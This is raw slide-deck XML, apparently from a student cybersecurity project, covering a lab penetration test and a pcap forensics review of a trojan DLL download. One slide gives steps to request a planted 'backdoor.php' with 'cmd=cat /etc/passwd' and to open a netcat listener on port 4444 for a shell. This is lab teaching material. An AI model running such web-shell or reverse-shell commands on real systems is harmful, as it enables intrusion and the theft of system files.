              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Navigate to : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.115/backdoor.php?cmd=cat%20/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Open a shell target: nc -lvp 4444</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2727" name="Google Shape;2727;ga8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_26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114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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a8fe11deed_0_2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a8fe11deed_0_26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ga8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_26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a8fe11deed_0_2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ga8fe11deed_0_26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a8fe11deed_0_2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a8fe11deed_0_26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8" name="Google Shape;2778;ga8fe11deed_0_26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a8fe11deed_0_266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a8fe11deed_0_26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a8fe11deed_0_2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a8fe11deed_0_26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We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>observed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Malware was downloaded called June11.DLL.  We were able to extract the June11.dll file from the pcap file.  In the terminal we ran the command md5sum on the DLL file and received  a hash “2545b15483165d1b6d63d9fd0821d”.  We entered the hash into virustotal.com and learned the file was a trojan.   Trojans commonly affect windows machines</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2796" name="Google Shape;2796;ga8fe11deed_0_26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a8fe11deed_0_2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a8fe11deed_0_26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We discovered that while the users were browsing youtube.com, they downloaded the DLL file.  A screen shot is included of the “Deceptive Site Ahead” alert when accessing the address</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2807" name="Google Shape;2807;ga8fe11deed_0_26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a8fe11deed_1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a8fe11deed_1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We also discovered the users created a AD network and Domain Controller called frank-n-ted.com on the corporate network so they could access youtube and installing desktop backgrounds.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>AD- Active Directory Domain Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>It authenticates and authorizes all users and computers in a Windows domain type network—assigning and enforcing security policies for all computers and installing or updating software.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Domain Controller - A domain controller (DC) is a server computer that responds to security authentication requests within a computer network domain.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2817" name="Google Shape;2817;ga8fe11deed_1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a8fe11deed_1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a8fe11deed_12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Additional analysis was done on other “empty” images in the pcap file.  We were unable to figure out the passcode for image “Family.jpg” when we tried to run a stegnography application to look for encrypted files, messages or videos</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2827" name="Google Shape;2827;ga8fe11deed_12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a8fe11deed_0_26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a8fe11deed_0_26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b10f3296a6_2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b10f3296a6_2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a8586bdea0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a8586bdea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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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50.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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61.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.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image" Target="../media/image167.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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3.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7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80.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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209.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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9.pn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55.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59.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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4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74.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6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82.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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78.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7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88.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106.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId8"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0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2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3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6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4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18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122.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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122.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24459000" cy="137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6" name="Google Shape;86;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7" name="Google Shape;87;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515" name="Shape 1515"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1516" name="Google Shape;1516;p10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7" name="Google Shape;1517;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8" name="Google Shape;1518;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19" name="Google Shape;1519;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0" name="Google Shape;1520;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1" name="Google Shape;1521;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2" name="Google Shape;1522;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3" name="Google Shape;1523;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3467313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1524" name="Google Shape;1524;p10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25" name="Google Shape;1525;p10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26" name="Google Shape;1526;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5333713"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1527" name="Google Shape;1527;p10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28" name="Google Shape;1528;p10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29" name="Google Shape;1529;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="7180979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1530" name="Google Shape;1530;p10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1" name="Google Shape;1531;p10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32" name="Google Shape;1532;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="9040979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1533" name="Google Shape;1533;p10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34" name="Google Shape;1534;p10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6" name="Google Shape;1536;p10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7" name="Google Shape;1537;p10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8" name="Google Shape;1538;p10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9" name="Google Shape;1539;p10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0" name="Google Shape;1540;p10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1" name="Google Shape;1541;p10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42" name="Google Shape;1542;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1251686" y="10888246"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1543" name="Google Shape;1543;p10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4" name="Google Shape;1544;p10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5" name="Google Shape;1545;p10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46" name="Google Shape;1546;p10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47" name="Shape 1547"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1548" name="Google Shape;1548;p10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49" name="Google Shape;1549;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0" name="Google Shape;1550;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51" name="Google Shape;1551;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52" name="Google Shape;1552;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3" name="Google Shape;1553;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54" name="Google Shape;1554;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55" name="Google Shape;1555;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1556" name="Google Shape;1556;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57" name="Google Shape;1557;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8" name="Google Shape;1558;p10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0" name="Google Shape;1560;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1561" name="Google Shape;1561;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62" name="Google Shape;1562;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3" name="Google Shape;1563;p10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4" name="Google Shape;1564;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1565" name="Google Shape;1565;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66" name="Google Shape;1566;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8" name="Google Shape;1568;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1569" name="Google Shape;15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0" name="Google Shape;15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1" name="Google Shape;1571;p10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2" name="Google Shape;1572;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1573" name="Google Shape;1573;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74" name="Google Shape;1574;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5" name="Google Shape;1575;p10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6" name="Google Shape;1576;p105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1577" name="Google Shape;157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78" name="Google Shape;157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9" name="Google Shape;1579;p10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0" name="Google Shape;1580;p10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1" name="Google Shape;1581;p10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2" name="Google Shape;1582;p10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3" name="Google Shape;1583;p10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84" name="Shape 1584"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1585" name="Google Shape;1585;p10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86" name="Google Shape;1586;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7" name="Google Shape;1587;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88" name="Google Shape;1588;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89" name="Google Shape;1589;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0" name="Google Shape;1590;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91" name="Google Shape;1591;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92" name="Google Shape;1592;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1593" name="Google Shape;1593;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94" name="Google Shape;1594;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5" name="Google Shape;1595;p10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7" name="Google Shape;1597;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1598" name="Google Shape;1598;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99" name="Google Shape;1599;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0" name="Google Shape;1600;p10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1" name="Google Shape;1601;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1602" name="Google Shape;1602;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603" name="Google Shape;1603;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5" name="Google Shape;1605;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1606" name="Google Shape;1606;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607" name="Google Shape;1607;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8" name="Google Shape;1608;p10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9" name="Google Shape;1609;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1610" name="Google Shape;1610;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611" name="Google Shape;1611;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2" name="Google Shape;1612;p10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3" name="Google Shape;1613;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1614" name="Google Shape;1614;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615" name="Google Shape;1615;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6" name="Google Shape;1616;p10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7" name="Google Shape;1617;p10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8" name="Google Shape;1618;p10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9" name="Google Shape;1619;p10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621" name="Shape 1621"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1622" name="Google Shape;1622;p10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23" name="Google Shape;1623;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4" name="Google Shape;1624;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25" name="Google Shape;1625;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27" name="Google Shape;1627;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29" name="Google Shape;1629;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="3066140"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1630" name="Google Shape;1630;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31" name="Google Shape;1631;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2" name="Google Shape;1632;p10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3" name="Google Shape;1633;p10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4" name="Google Shape;1634;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="4459807"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1635" name="Google Shape;1635;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36" name="Google Shape;1636;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7" name="Google Shape;1637;p10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8" name="Google Shape;1638;p10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9" name="Google Shape;1639;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="5854874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1640" name="Google Shape;1640;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41" name="Google Shape;1641;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2" name="Google Shape;1642;p10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3" name="Google Shape;1643;p10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4" name="Google Shape;1644;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="7248540"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1645" name="Google Shape;1645;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46" name="Google Shape;1646;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7" name="Google Shape;1647;p10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8" name="Google Shape;1648;p10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9" name="Google Shape;1649;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="8642207"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1650" name="Google Shape;1650;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51" name="Google Shape;1651;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2" name="Google Shape;1652;p10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3" name="Google Shape;1653;p10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4" name="Google Shape;1654;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="10035874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1655" name="Google Shape;1655;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56" name="Google Shape;1656;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7" name="Google Shape;1657;p10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8" name="Google Shape;1658;p10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9" name="Google Shape;1659;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="11497607"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1660" name="Google Shape;1660;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61" name="Google Shape;1661;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2" name="Google Shape;1662;p10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63" name="Shape 1663"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1664" name="Google Shape;1664;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5" name="Google Shape;1665;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66" name="Google Shape;1666;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67" name="Google Shape;1667;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68" name="Google Shape;1668;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69" name="Google Shape;1669;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0" name="Google Shape;1670;p10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1" name="Google Shape;1671;p108"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1672" name="Google Shape;1672;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73" name="Google Shape;1673;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4" name="Google Shape;1674;p10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5" name="Google Shape;1675;p10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6" name="Google Shape;1676;p108"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
